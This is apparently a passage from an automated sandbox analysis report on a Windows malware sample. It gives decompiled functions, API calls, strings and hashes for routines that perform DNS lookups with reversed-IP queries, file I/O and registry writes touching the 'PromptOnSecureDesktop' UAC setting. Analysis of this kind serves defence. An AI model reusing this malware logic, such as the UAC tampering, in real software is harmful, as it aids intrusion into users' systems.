Opcode ID: e9e60d08fd5b38123c2305bd0749cd56285ebf99e088dae16c2983ddbdba65da
Instruction ID: 5e38ed9511aa8cc069582274463af9cddeeab7037fd65aad7bdf8be664a95ff7
Opcode Fuzzy Hash: e9e60d08fd5b38123c2305bd0749cd56285ebf99e088dae16c2983ddbdba65da
Instruction Fuzzy Hash: 5AF0C8B2680118BBF3106B51AC0BFDF3A2CDB44704F100075F605B50D2E6E55E9082BD

Uniqueness

Uniqueness Score: -1.00%

Function 022328D4, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20networkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(u6A), ref: 022328E3
gethostbyname.WS2_32(u6A), ref: 022328EF

Strings

time_cfg, xrefs: 022328D4
u6A, xrefs: 022328D5, 022328E2, 022328EE

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: gethostbynameinet_addr
String ID: time_cfg$u6A
API String ID: 1594361348-1940331995
Opcode ID: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
Instruction ID: e612efe254f251af987212d12bb0b5d95b8dc1e6416805784db317c310c54182
Opcode Fuzzy Hash: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
Instruction Fuzzy Hash: 0AE08C306140129FC7118B28F848AC537A4EF06230F118281F844C31A8C3309CC19794

Uniqueness

Uniqueness Score: -1.00%

Function 00402684, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20networkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(?), ref: 00402693
gethostbyname.WS2_32(?), ref: 0040269F

Strings

~s`ysps, xrefs: 00402693
time_cfg, xrefs: 00402684

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: gethostbynameinet_addr
String ID: time_cfg$~s`ysps
API String ID: 1594361348-2010419113
Opcode ID: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
Instruction ID: 506fadec158220b53989f58c32679351ed61dc8f5455c60e8cf87b9af1828998
Opcode Fuzzy Hash: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
Instruction Fuzzy Hash: 9CE08C302040219FCB108B28F848AC637A4AF06330F0189A2F840E32E0C7B89CC08688

Uniqueness

Uniqueness Score: -1.00%

Function 0223D7B9, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 7sleepCOMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 0223D7BC
Sleep.KERNEL32(000003E8), ref: 0223D7C7
ExitProcess.KERNEL32 ref: 0223D7D3

Strings

ps, xrefs: 0223D7BC

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: ExitProcessSleepclosesocket
String ID: ps
API String ID: 2012141568-3878219058
Opcode ID: 62423e371fffda69046d8eb6e24d3e0af6545849842ca429e8690cad87b9d791
Instruction ID: e49baf8e795f861d06f567ade1452cecb1875c17f55203b63c4a6d30e9a1a540
Opcode Fuzzy Hash: 62423e371fffda69046d8eb6e24d3e0af6545849842ca429e8690cad87b9d791
Instruction Fuzzy Hash: 22C048B1841308EBD7422BA4FC4CA8C3E6AAF08302B21D160A10A900B0CAB00A808A29

Uniqueness

Uniqueness Score: -1.00%

Function 022369AC, Relevance: 6.2, APIs: 4, Instructions: 199COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNEL32(?,00000080), ref: 022369CE
SetFileAttributesA.KERNEL32(?,00000002), ref: 02236A0F
GetFileSize.KERNEL32(000000FF,00000000), ref: 02236A23
CloseHandle.KERNEL32(000000FF), ref: 02236BC1

Part of subcall function 0223EE7E: GetProcessHeap.KERNEL32(00000000,?,00000000,02231DB8,?), ref: 0223EE91
Part of subcall function 0223EE7E: HeapFree.KERNEL32(00000000), ref: 0223EE98

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: File$AttributesHeap$CloseFreeHandleProcessSize
String ID:
API String ID: 3384756699-0
Opcode ID: 7cb1483d7ca4a0334585b6ef60a3fe03637638a32adcd708d2059a772ed48796
Instruction ID: 66eaadabdad80c8f2e67fad4cbb94d5b5f796df13ebfdcd08b02bf46c45f6ada
Opcode Fuzzy Hash: 7cb1483d7ca4a0334585b6ef60a3fe03637638a32adcd708d2059a772ed48796
Instruction Fuzzy Hash: 057117B191021AFFDF118FA4CC84AFEBBBEFB04354F1045AAE515A6194D7709A82CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00401C5F, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401C5F(void* __eflags) {
				signed int _t49;
				signed int _t51;
				void* _t80;
				char _t91;
				void* _t92;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t107;
				void* _t108;

				_t105 = _t107 - 0x70;
				_t108 = _t107 - 0x114;
				 *(_t105 + 0x6c) =  *(_t105 + 0x6c) & 0x00000000;
				_t98 =  *(_t105 + 0x7c);
				 *(_t105 + 0x7c) =  *(_t105 + 0x7c) & 0x00000000;
				_t101 = E0040ED03(_t98, 0x2c);
				if(_t101 == 0) {
					L6:
					_t49 = _t98;
					_t32 = _t49 + 1; // 0x2
					_t102 = _t32;
					do {
						_t91 =  *_t49;
						_t49 = _t49 + 1;
					} while (_t91 != 0);
					 *((char*)(_t105 + _t49 - _t102 - 0x24)) = _t91;
					_t51 = _t98;
					_t35 = _t51 + 1; // 0x2
					_t103 = _t35;
					do {
						_t92 =  *_t51;
						_t51 = _t51 + 1;
					} while (_t92 != 0);
					E0040EE5C(_t105 - 0x24, _t98, _t51 - _t103);
					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x7b) & 0x000000ff,  *(_t105 + 0x7a) & 0x000000ff,  *(_t105 + 0x79) & 0x000000ff,  *(_t105 + 0x78) & 0x000000ff, _t105 - 0x24);
					if(E00402684(_t105 - 0xa4) != 0) {
						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);
					}
					L12:
					return  *(_t105 + 0x6c);
				}
				 *(_t105 + 0x5c) =  *(_t105 + 0x78) & 0x000000ff;
				 *(_t105 + 0x60) =  *(_t105 + 0x79) & 0x000000ff;
				 *(_t105 + 0x68) =  *(_t105 + 0x7a) & 0x000000ff;
				 *(_t105 + 0x64) =  *(_t105 + 0x7b) & 0x000000ff;
				while(1) {
					 *((char*)(_t105 + _t101 - _t98 - 0x24)) = 0;
					E0040EE5C(_t105 - 0x24, _t98, _t101 - _t98);
					_t22 = _t101 + 1; // 0x1
					_t98 = _t22;
					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x64),  *(_t105 + 0x68),  *(_t105 + 0x60),  *(_t105 + 0x5c), _t105 - 0x24);
					_t80 = E00402684(_t105 - 0xa4);
					_t108 = _t108 + 0x2c;
					if(_t80 != 0) {
						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);
					}
					 *(_t105 + 0x7c) =  *(_t105 + 0x7c) + 1;
					if( *(_t105 + 0x7c) > 0x1e) {
						goto L12;
					}
					_t101 = E0040ED03(_t98, 0x2c);
					if(_t101 != 0) {
						continue;
					}
					goto L6;
				}
				goto L12;
			}

0x00401c60
0x00401c64
0x00401c6a
0x00401c71
0x00401c74
0x00401c86
0x00401c8c
0x00401d1c
0x00401d1c
0x00401d1e
0x00401d1e
0x00401d21
0x00401d21
0x00401d23
0x00401d24
0x00401d2a
0x00401d2e
0x00401d30
0x00401d30
0x00401d33
0x00401d33
0x00401d35
0x00401d36
0x00401d42
0x00401d6b
0x00401d7e
0x00401d88
0x00401d88
0x00401d8b
0x00401d95
0x00401d95
0x00401c96
0x00401c9d
0x00401ca4
0x00401cab
0x00401cae
0x00401cb3
0x00401cbd
0x00401cd2
0x00401cd2
0x00401ce1
0x00401cea
0x00401cef
0x00401cf4
0x00401cfe
0x00401cfe
0x00401d04
0x00401d0a
0x00000000
0x00000000
0x00401d14
0x00401d1a
0x00000000
0x00000000
0x00000000
0x00401d1a
0x00000000

APIs

wsprintfA.USER32 ref: 00401CE1
wsprintfA.USER32 ref: 00401D6B

Strings

localcfg, xrefs: 00401C70
%u.%u.%u.%u.%s, xrefs: 00401CDB, 00401D65

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: wsprintf
String ID: %u.%u.%u.%u.%s$localcfg
API String ID: 2111968516-120809033
Opcode ID: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
Instruction ID: f60862e96afe744063ef1f8e151e0253a3d6131670b42bf9f562b78b9aabf051
Opcode Fuzzy Hash: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
Instruction Fuzzy Hash: 3C41C1729042999FDB21DF798D44BEE7BE89F49310F240066FD64E3192D639EA04CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02234168, Relevance: 6.0, APIs: 4, Instructions: 46filesynchronizationCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02234194
GetLastError.KERNEL32 ref: 0223419E
WaitForSingleObject.KERNEL32(?,?), ref: 022341AF
GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 022341C2

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
String ID:
API String ID: 3373104450-0
Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
Instruction ID: 08b05e9c4a2359971dd17a26b9a67bd06ab769a73359332dfc1680ea5704ad37
Opcode Fuzzy Hash: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
Instruction Fuzzy Hash: 1E01A9B252150AABDF12EF90ED45BEF7B7CFB19256F1040A2F901E2060D7709A64CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 022341DC, Relevance: 6.0, APIs: 4, Instructions: 46filesynchronizationCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02234208
GetLastError.KERNEL32 ref: 02234212
WaitForSingleObject.KERNEL32(?,?), ref: 02234223
GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 02234236

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
String ID:
API String ID: 888215731-0
Opcode ID: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
Instruction ID: c52c4a1ce93e1366cf720617dccad44b2ee74e0316fe8fb798220c574c034a3d
Opcode Fuzzy Hash: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
Instruction Fuzzy Hash: 08010CB262110AABDF02EF90ED45BEF7B6CFB08255F4140A1F901E2150D7B0DA54CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 00403F18, Relevance: 6.0, APIs: 4, Instructions: 46
filesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403F18(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
				struct _OVERLAPPED _v24;
				long _t30;
				void* _t31;

				_v24.Offset = _v24.Offset & 0x00000000;
				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
				_t30 = _a12;
				_t31 = _a16;
				_a16 = _a16 & 0x00000000;
				_v24.hEvent = _t31;
				if(WriteFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
					L3:
					if(_t30 != _a16) {
						L5:
						return 0;
					}
					return 1;
				}
				if(GetLastError() != 0x3e5) {
					goto L5;
				}
				WaitForSingleObject(_t31, _a20);
				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
					goto L5;
				}
				goto L3;
			}

0x00403f1e
0x00403f22
0x00403f27
0x00403f2b
0x00403f2e
0x00403f3e
0x00403f4c
0x00403f7c
0x00403f7f
0x00403f86
0x00000000
0x00403f86
0x00000000
0x00403f83
0x00403f59
0x00000000
0x00000000
0x00403f5f
0x00403f7a
0x00000000
0x00000000
0x00000000

APIs

WriteFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403F44
GetLastError.KERNEL32 ref: 00403F4E
WaitForSingleObject.KERNEL32(00000004,?), ref: 00403F5F
GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403F72

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
String ID:
API String ID: 3373104450-0
Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
Instruction ID: 81d5a9f64dfd66904774ebc82d2e0e48c629fa8216d99cd76bf4a5dbd4e59073
Opcode Fuzzy Hash: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
Instruction Fuzzy Hash: B9010C7291110AABDF01DF90ED44BEF7B7CEB08356F104066FA01E2190D774DA558BB6

Uniqueness

Uniqueness Score: -1.00%

Function 00403F8C, Relevance: 6.0, APIs: 4, Instructions: 46
filesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403F8C(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
				struct _OVERLAPPED _v24;
				long _t30;
				void* _t31;

				_v24.Offset = _v24.Offset & 0x00000000;
				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
				_t30 = _a12;
				_t31 = _a16;
				_a16 = _a16 & 0x00000000;
				_v24.hEvent = _t31;
				if(ReadFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
					L3:
					if(_t30 != _a16) {
						L5:
						return 0;
					}
					return 1;
				}
				if(GetLastError() != 0x3e5) {
					goto L5;
				}
				WaitForSingleObject(_t31, _a20);
				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
					goto L5;
				}
				goto L3;
			}

0x00403f92
0x00403f96
0x00403f9b
0x00403f9f
0x00403fa2
0x00403fb2
0x00403fc0
0x00403ff0
0x00403ff3
0x00403ffa
0x00000000
0x00403ffa
0x00000000
0x00403ff7
0x00403fcd
0x00000000
0x00000000
0x00403fd3
0x00403fee
0x00000000
0x00000000
0x00000000

APIs

ReadFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403FB8
GetLastError.KERNEL32 ref: 00403FC2
WaitForSingleObject.KERNEL32(00000004,?), ref: 00403FD3
GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403FE6

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
String ID:
API String ID: 888215731-0
Opcode ID: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
Instruction ID: 44fd539f7a3468c5635e20a1652967c761b46accf60e77792ab8a53432005efc
Opcode Fuzzy Hash: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
Instruction Fuzzy Hash: A601177291110AAFDF01DF90ED45BEF3B7CEF08356F004062F906E2090D7749A549BA6

Uniqueness

Uniqueness Score: -1.00%

Function 0223E01F, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 35stringCOMMON

Download Yara Rule

APIs

lstrcmp.KERNEL32(?,80000009), ref: 0223E04F

Strings

A, xrefs: 0223E068
A, xrefs: 0223E01F
A, xrefs: 0223E020, 0223E025

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: lstrcmp
String ID: A$ A$ A
API String ID: 1534048567-1846390581
Opcode ID: 328de717d7c8de90c20bd47ba6ba1583dee1274120ab1c13f1680d5d51b61bca
Instruction ID: 738ab9dccaba6a3f2e386e9a939de2c7f6c6e3db0024ee8304dada5b905276bb
Opcode Fuzzy Hash: 328de717d7c8de90c20bd47ba6ba1583dee1274120ab1c13f1680d5d51b61bca
Instruction Fuzzy Hash: F9F0F6B12003139FCB32CFA4D884A82B7E8FF04321B05862AE564E3064D334E59CCB51

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4C7, Relevance: 6.0, APIs: 4, Instructions: 27
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A4C7(intOrPtr _a4) {
				long _t3;
				LONG* _t8;
				long _t9;

				_t9 = GetTickCount();
				_t8 = _a4 + 0x5c;
				while(1) {
					_t3 = InterlockedExchange(_t8, 1);
					if(_t3 == 0) {
						break;
					}
					_t3 = GetTickCount() - _t9;
					if(_t3 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t3;
			}

0x0040a4dd
0x0040a4df
0x0040a4f7
0x0040a4fa
0x0040a4fe
0x00000000
0x00000000
0x0040a4e6
0x0040a4ed
0x0040a4f1
0x00000000
0x0040a4f1
0x00000000
0x0040a4ed
0x0040a504

APIs

GetTickCount.KERNEL32 ref: 0040A4D1
GetTickCount.KERNEL32 ref: 0040A4E4
Sleep.KERNEL32(00000000,?,0040C2E9,0040C4E0,00000000,localcfg,?,0040C4E0,00413588,00408810), ref: 0040A4F1
InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CountTick$ExchangeInterlockedSleep
String ID:
API String ID: 2207858713-0
Opcode ID: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
Instruction ID: a5473328a7e7118e9aede6741b06156156ec1e7733dd8d1ec56465b12724d56e
Opcode Fuzzy Hash: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
Instruction Fuzzy Hash: 7DE0863720131567C6005BA5BD84FAA7B98AB4D761F164072FB08E3280D6AAA99145BF

Uniqueness

Uniqueness Score: -1.00%

Function 00404E92, Relevance: 6.0, APIs: 4, Instructions: 27
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E92(void* __ecx) {
				long _t2;
				void* _t7;
				LONG* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = GetTickCount();
				_t8 = _t7 + 4;
				while(1) {
					_t2 = InterlockedExchange(_t8, 1);
					if(_t2 == 0) {
						break;
					}
					_t2 = GetTickCount() - _t9;
					if(_t2 < 0x2710) {
						Sleep(0xa);
						continue;
					}
					break;
				}
				return _t2;
			}

0x00404e9c
0x00404ea6
0x00404ea8
0x00404ec0
0x00404ec3
0x00404ec7
0x00000000
0x00000000
0x00404eaf
0x00404eb6
0x00404eba
0x00000000
0x00404eba
0x00000000
0x00404eb6
0x00404ecd

APIs

GetTickCount.KERNEL32 ref: 00404E9E
GetTickCount.KERNEL32 ref: 00404EAD
Sleep.KERNEL32(0000000A,?,00000001), ref: 00404EBA
InterlockedExchange.KERNEL32(?,00000001), ref: 00404EC3

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CountTick$ExchangeInterlockedSleep
String ID:
API String ID: 2207858713-0
Opcode ID: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
Instruction ID: 0be737a4b1ecb403dd0b6a084e6b0260aeafc6613011e157a8d43e60cd200510
Opcode Fuzzy Hash: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
Instruction Fuzzy Hash: 6AE086B620121457D61027B9FD84F966A89AB9A361F010532F70DE21C0C6AA989345FD

Uniqueness

Uniqueness Score: -1.00%

Function 00404BD1, Relevance: 6.0, APIs: 4, Instructions: 27
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404BD1(void* __ecx) {
				long _t2;
				void* _t7;
				LONG* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = GetTickCount();
				_t8 = _t7 + 0xc;
				while(1) {
					_t2 = InterlockedExchange(_t8, 1);
					if(_t2 == 0) {
						break;
					}
					_t2 = GetTickCount() - _t9;
					if(_t2 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t2;
			}

0x00404bdb
0x00404be5
0x00404be7
0x00404bff
0x00404c02
0x00404c06
0x00000000
0x00000000
0x00404bee
0x00404bf5
0x00404bf9
0x00000000
0x00404bf9
0x00000000
0x00404bf5
0x00404c0c

APIs

GetTickCount.KERNEL32 ref: 00404BDD
GetTickCount.KERNEL32 ref: 00404BEC
Sleep.KERNEL32(00000000,?,?,?,00000004,004050F2), ref: 00404BF9
InterlockedExchange.KERNEL32(-00000008,00000001), ref: 00404C02

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CountTick$ExchangeInterlockedSleep
String ID:
API String ID: 2207858713-0
Opcode ID: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
Instruction ID: c27c4130c4fb343c81443d6f5f76baf76a02980c1ff66e5fdc0d00212ab38f61
Opcode Fuzzy Hash: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
Instruction Fuzzy Hash: FCE0867624521457D61027A66D80FA67BA89B99361F064073F70CE2190C9AAE48141BD

Uniqueness

Uniqueness Score: -1.00%

Function 004030FA, Relevance: 6.0, APIs: 4, Instructions: 23
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004030FA(LONG* _a4) {
				long _t3;
				long _t5;

				_t5 = GetTickCount();
				while(1) {
					_t3 = InterlockedExchange(_a4, 1);
					if(_t3 == 0) {
						break;
					}
					_t3 = GetTickCount() - _t5;
					if(_t3 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t3;
			}

0x0040310b
0x00403122
0x00403128
0x0040312c
0x00000000
0x00000000
0x00403111
0x00403118
0x0040311c
0x00000000
0x0040311c
0x00000000
0x00403118
0x00403131

APIs

GetTickCount.KERNEL32 ref: 00403103
GetTickCount.KERNEL32 ref: 0040310F
Sleep.KERNEL32(00000000), ref: 0040311C
InterlockedExchange.KERNEL32(?,00000001), ref: 00403128

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CountTick$ExchangeInterlockedSleep
String ID:
API String ID: 2207858713-0
Opcode ID: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
Instruction ID: 9edc608f4d32da9f9de986fa19dd3c9deb40157c310ade5cfb00ff6fe32d5b40
Opcode Fuzzy Hash: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
Instruction Fuzzy Hash: 51E0C235200215ABDB00AF75BD44B8A6E9EDF8C762F014432F205EA1E0C9F44D51897A

Uniqueness

Uniqueness Score: -1.00%

Function 0223E3C7, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(00000001,0223DD30,00000000,00000000,00000000), ref: 0223E459
CloseHandle.KERNEL32(00000001,00000003), ref: 0223E46D

Part of subcall function 0223E2E5: RegCreateKeyExA.ADVAPI32(80000001,0223E4F3,00000000,00000000,00000000,00020106,00000000,0223E4F3,00000000,000000E4), ref: 0223E302
Part of subcall function 0223E2E5: RegSetValueExA.ADVAPI32(0223E4F3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0223E377
Part of subcall function 0223E2E5: RegDeleteValueA.ADVAPI32(0223E4F3,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0223E3A8
Part of subcall function 0223E2E5: RegCloseKey.ADVAPI32(0223E4F3,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,0223E4F3), ref: 0223E3B1

Strings

PromptOnSecureDesktop, xrefs: 0223E4DA, 0223E4DF, 0223E520, 0223E54A

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: CloseValue$CreateDeleteFileHandleWrite
String ID: PromptOnSecureDesktop
API String ID: 4151426672-2980165447
Opcode ID: 0d842a812c41475983daaa2a6cc4769c4a51844b1af4772490834f37a36ff51c
Instruction ID: ade91bddcc57e6176197b153c0e9714fcfefaa4f17b3c04f9db3b8ba04990f4a
Opcode Fuzzy Hash: 0d842a812c41475983daaa2a6cc4769c4a51844b1af4772490834f37a36ff51c
Instruction Fuzzy Hash: 3E41E8F2910308BADB22AED18C05FDB3B6CEF08754F018065FE09A4095F7B59654CAB4

Uniqueness

Uniqueness Score: -1.00%

Function 0040E177, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040E177(signed int _a4, long _a8) {
				void* _v8;
				void* _v12;
				void* __ecx;
				void* _t31;
				void* _t34;
				intOrPtr* _t36;
				void* _t38;
				intOrPtr* _t41;
				void* _t43;
				void* _t46;
				void* _t47;
				void* _t57;
				void* _t58;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t77;

				_push(_t58);
				_push(_t58);
				if(_a8 != 0) {
					L2:
					if( *0x4136c0 == 0) {
						L20:
						_t31 = 1;
						L21:
						return _t31;
					}
					if((_a4 & 0x00000001) != 0) {
						_t46 = E0040DFE2(_t58, 1,  &_v8,  &_a8);
						_t67 = _t67 + 0xc;
						if(_t46 != 0) {
							_t81 = _a8;
							if(_a8 != 0) {
								_t47 = E0040DBCF(_t81, 0x40000000, 2);
								_pop(_t58);
								_v12 = _t47;
								if(_t47 != 0xffffffff) {
									_t57 = _v8;
									if(_t57 != 0 && _a8 != 0) {
										E00402544(_t57, _t57, _a8, 0xe4, 0xc8);
										_t67 = _t67 + 0x14;
										if(WriteFile(_v12, _t57, _a8,  &_a8, 0) != 0) {
											 *0x4136c0 =  *0x4136c0 & 0x00000000;
										}
									}
									CloseHandle(_v12);
								}
							}
						}
					}
					if((_a4 & 0x00000002) == 0) {
						L19:
						goto L20;
					}
					_t34 = E0040DFE2(_t58, 2,  &_v8,  &_a8);
					_t68 = _t67 + 0xc;
					if(_t34 == 0 || _a8 == 0) {
						goto L19;
					} else {
						E00402544(_v8, _v8, _a8, 0xe4, 0xc8);
						_t36 = E00402544(0x4128f8, 0x4110d0, 7, 0xe4, 0xc8);
						_t38 = E0040E095(0x80000001, E00402544(0x4122f8, 0x4110bc, 0x14, 0xe4, 0xc8), _t36, _v8, _a8);
						_t72 = _t68 + 0x50;
						if(_t38 != 0) {
							L17:
							 *0x4136c0 =  *0x4136c0 & 0x00000000;
							L18:
							E0040EE2A(_t58, 0x4122f8, 0, 0x100);
							E0040EE2A(_t58, 0x4128f8, 0, 0x100);
							goto L19;
						}
						_t41 = E00402544(0x4128f8, 0x4110d0, 7, 0xe4, 0xc8);
						_t43 = E0040E095(0x80000001, E00402544(0x4122f8, 0x4110a0, 0x19, 0xe4, 0xc8), _t41, _v8, _a8);
						_t72 = _t72 + 0x3c;
						if(_t43 == 0) {
							goto L18;
						}
						goto L17;
					}
				}
				_t31 = 1;
				_t77 =  *0x4120ec - _t31; // 0x1
				if(_t77 != 0) {
					goto L21;
				}
				goto L2;
			}

0x0040e17a
0x0040e17b
0x0040e182
0x0040e193
0x0040e199
0x0040e312
0x0040e314
0x0040e315
0x0040e317
0x0040e317
0x0040e1ad
0x0040e1b9
0x0040e1be
0x0040e1c3
0x0040e1c5
0x0040e1c8
0x0040e1d1
0x0040e1d7
0x0040e1d8
0x0040e1de
0x0040e1e0
0x0040e1e5
0x0040e1f4
0x0040e1f9
0x0040e211
0x0040e213
0x0040e213
0x0040e211
0x0040e21d
0x0040e21d
0x0040e1de
0x0040e1c8
0x0040e1c3
0x0040e227
0x0040e310
0x00000000
0x0040e311
0x0040e237
0x0040e23c
0x0040e241
0x00000000
0x0040e251
0x0040e25c
0x0040e278
0x0040e29e
0x0040e2a3
0x0040e2a8
0x0040e2eb
0x0040e2eb
0x0040e2f2
0x0040e2fb
0x0040e308
0x00000000
0x0040e30d
0x0040e2be
0x0040e2df
0x0040e2e4
0x0040e2e9
0x00000000
0x00000000
0x00000000
